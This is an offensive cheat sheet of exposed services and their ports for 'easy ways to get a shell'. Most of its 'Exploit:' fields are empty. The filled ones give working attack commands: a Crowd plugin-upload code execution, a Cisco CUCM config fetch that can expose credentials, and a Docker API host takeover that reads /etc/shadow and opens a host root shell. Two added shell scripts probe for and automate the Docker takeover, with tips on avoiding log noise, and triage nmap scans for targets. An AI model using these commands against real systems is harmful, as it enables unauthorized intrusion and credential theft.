Low-Hanging Fruit
Easy ways to get a shell
Services
Adobe ColdFusion BlazeDS
Ports: 8080
Exploit:
Apache Flink
Ports: 5000
Exploit:
Apache Hadoop
Ports: 8088
Exploit:
Apache Solr
Ports: 8983
Exploit:
Apache Spark
Ports: 6066
Exploit:
Atlassian Crowd
Ports: 4990
Exploit:
curl -k -H "Content-Type: multipart/mixed" \
  --form "file_cdl=@[PLUGIN.JAR]" \
  http://[HOST]:4990/crowd/admin/uploadplugin.action
Uploads a plugin JAR through the exposed pdkinstall development plugin (CVE-2019-11580); the code in the JAR then runs inside the Crowd process.
Cisco Smart Install
Ports: 4786
Exploit:
Cisco Unified Communications Manager
Ports: 6970
Exploit:
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
Lists the files the TFTP-over-HTTP service will hand out; the phone configuration files fetched from the same port can contain credentials.
Dameware
Ports: 6129
Exploit:
Dell iDRAC
Ports: 443
Exploit:
Docker API
Ports: 2375
Exploit:
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access:
cat /mnt/etc/shadow
Remote Code Execution:
chroot /mnt
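A check-then-exploit wrapper for the Docker API commands above, added here as an example and not part of the original cheat sheet. It confirms with a read-only GET /version that the daemon answers without authentication before a privileged container is started, then wraps the run/chroot sequence in one command. The host 10.0.0.5 in the comments and the JSON reply used for the self-test are constructed; the ApiVersion field name is what a real daemon returns.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): probe tcp/2375 for an
# unauthenticated Docker Engine API, then take over the host with the same
# privileged container + chroot trick shown above.
set -eu

# docker_api_version: read a /version JSON body on stdin and print its
# ApiVersion. Prints nothing and returns 1 when the body is not a Docker reply
# (e.g. an HTML page from some other service squatting on the port).
docker_api_version() {
  local v
  v=$(sed -n 's/.*"ApiVersion":"\([^"]*\)".*/\1/p' | head -n 1)
  [ -n "$v" ] && printf '%s\n' "$v"
}

# docker_api_probe HOST [PORT]: GET /version is read-only, so this is safe to
# run before anything noisy. Succeeds only if the daemon answered.
docker_api_probe() {
  local host="$1" port="${2:-2375}"
  curl -s -m 5 "http://$host:$port/version" | docker_api_version
}

# docker_host_shell HOST [PORT]: the takeover from the commands above in one
# step: privileged container, host root mounted at /mnt, chroot into it, so
# the shell you get is a root shell on the host, not in the container.
docker_host_shell() {
  local host="$1" port="${2:-2375}"
  docker -H "tcp://$host:$port" run --rm -it --privileged --net=host \
    -v /:/mnt alpine chroot /mnt /bin/sh
}

# Constructed sample reply, shaped like a real daemon's /version body.
SAMPLE_VERSION_JSON='{"Platform":{"Name":"Docker Engine - Community"},"Version":"24.0.5","ApiVersion":"1.43","MinAPIVersion":"1.12","Os":"linux","Arch":"amd64"}'

# Usage: ./docker-lhf.sh 10.0.0.5   (host is a constructed example)
if [ $# -gt 0 ]; then
  if ver=$(docker_api_probe "$1"); then
    echo "[+] $1: unauthenticated Docker API $ver; run: docker_host_shell $1"
  else
    echo "[-] $1: no Docker API reply on ${2:-2375}"
  fi
fi
```

Keep the probe step: a 2375 listener is sometimes a TLS-only daemon or an unrelated service, and the privileged `run` is the action that shows up in host logs, so only issue it once `/version` has answered in the clear.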
GlassFish
Ports: 4848
Exploit:
HashiCorp Consul
Ports: 8500
Exploit:
HP Data Protector
Ports: 5555, 5556
Exploit:
HP iLO
Ports: 80, 443
Exploit:
IBM WebSphere
Ports: 8880
Exploit:
IPMI
Ports: 623
Exploit:
Java RMI
Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999
Exploit:
JBoss
Ports: 4444, 4445, 11111
Exploit:
JDWP
Ports: 5005-5009, 45000, 45001
Exploit:
JMX
Ports: 8686, 9012, 50500
Exploit:
MS17-010: EternalBlue
Ports: 139, 445
Exploit:
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip
The script only reports whether the host is vulnerable; exploitation needs a separate MS17-010 exploit module.
Portainer
Ports: 9000
Exploit:
PrintNightmare
Ports: 445
Exploit:
crackmapexec smb $host_file -u $username -p $password -M spooler
The spooler module only reports on which hosts the Print Spooler is reachable over MS-RPRN; a reachable spooler is then exploited with a separate PrintNightmare (CVE-2021-34527) exploit.
Redis
Ports: 6379
Exploit:
SAP
Ports: 3300
Exploit:
WebLogic
Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503
Exploit:
Zoho ManageEngine Desktop
Ports: 8383
Exploit:
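The service list above is most useful when a scan is already in hand, so here is a triage script, added as an example and not part of the original cheat sheet, that reads nmap grepable output (-oG) and prints every open port that matches a service on this page. The port table is taken from the list above with the ranges expanded (PrintNightmare, which lists no port, is omitted); the two scan lines at the bottom are constructed sample data, not a real scan.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): map open ports in an nmap -oG
# scan onto the low-hanging-fruit services listed above.
set -eu

# service|comma-separated ports, in the order the page lists them (ranges
# expanded). 4444 and 9000 appear twice on purpose: the page lists them for
# more than one product.
LHF_TABLE='Adobe ColdFusion BlazeDS|8080
Apache Flink|5000
Apache Hadoop|8088
Apache Solr|8983
Apache Spark|6066
Atlassian Crowd|4990
Cisco Smart Install|4786
Cisco Unified Communications Manager|6970
Dameware|6129
Dell iDRAC|443
Docker API|2375
GlassFish|4848
HashiCorp Consul|8500
HP Data Protector|5555,5556
HP iLO|80,443
IBM WebSphere|8880
IPMI|623
Java RMI|1090,1098,1099,4444,11099,47001,47002,10999
JBoss|4444,4445,11111
JDWP|5005,5006,5007,5008,5009,45000,45001
JMX|8686,9012,50500
MS17-010 (EternalBlue)|139,445
Portainer|9000
Redis|6379
SAP|3300
WebLogic|7000,7001,7002,7003,7004,7070,7071,8000,8001,8002,8003,9000,9001,9002,9003,9503
Zoho ManageEngine Desktop|8383'

# lhf_lookup PORT: print every listed service that uses PORT, one per line.
# The surrounding commas make the match exact (80 does not match 8080).
lhf_lookup() {
  local port="$1"
  printf '%s\n' "$LHF_TABLE" | while IFS='|' read -r name ports; do
    case ",$ports," in *",$port,"*) printf '%s\n' "$name" ;; esac
  done
}

# lhf_triage: read nmap -oG lines on stdin and print "host:port service" for
# each open port found in the table. A -oG host line is tab-separated:
#   Host: 10.0.0.5 ()<TAB>Ports: 2375/open/tcp//docker///, ...<TAB>Ignored State: ...
# and each Ports entry is port/state/proto/owner/service/rpcinfo/version.
lhf_triage() {
  awk 'BEGIN { FS = "\t" }
       /^Host: / {
         host = $1; sub(/^Host: /, "", host); sub(/ .*/, "", host)
         for (i = 2; i <= NF; i++) {
           if ($i !~ /^Ports: /) continue
           plist = $i; sub(/^Ports: /, "", plist)
           n = split(plist, entry, ", *")
           for (j = 1; j <= n; j++) {
             split(entry[j], f, "/")
             if (f[2] == "open") print host, f[1]
           }
         }
       }' |
  while read -r host port; do
    lhf_lookup "$port" | while IFS= read -r svc; do
      printf '%s:%s %s\n' "$host" "$port" "$svc"
    done
  done
}

# Constructed sample scan (two hosts). Real input: nmap -oG scan.gnmap ...
SAMPLE_SCAN=$(printf 'Host: 10.0.0.5 ()\tPorts: 22/closed/tcp//ssh///, 445/open/tcp//microsoft-ds///, 2375/open/tcp//docker///\tIgnored State: filtered (997)\nHost: 10.0.0.9 ()\tPorts: 4444/open/tcp//krb524///, 9000/open/tcp//cslistener///\tIgnored State: closed (998)\n')

# Usage: printf '%s\n' "$SAMPLE_SCAN" | lhf_triage     or: lhf_triage < scan.gnmap
```

The match is by port number only, so a hit is a lead to verify against the service's own check above, not a confirmed finding; ports such as 9000 or 4444 produce several candidates by design.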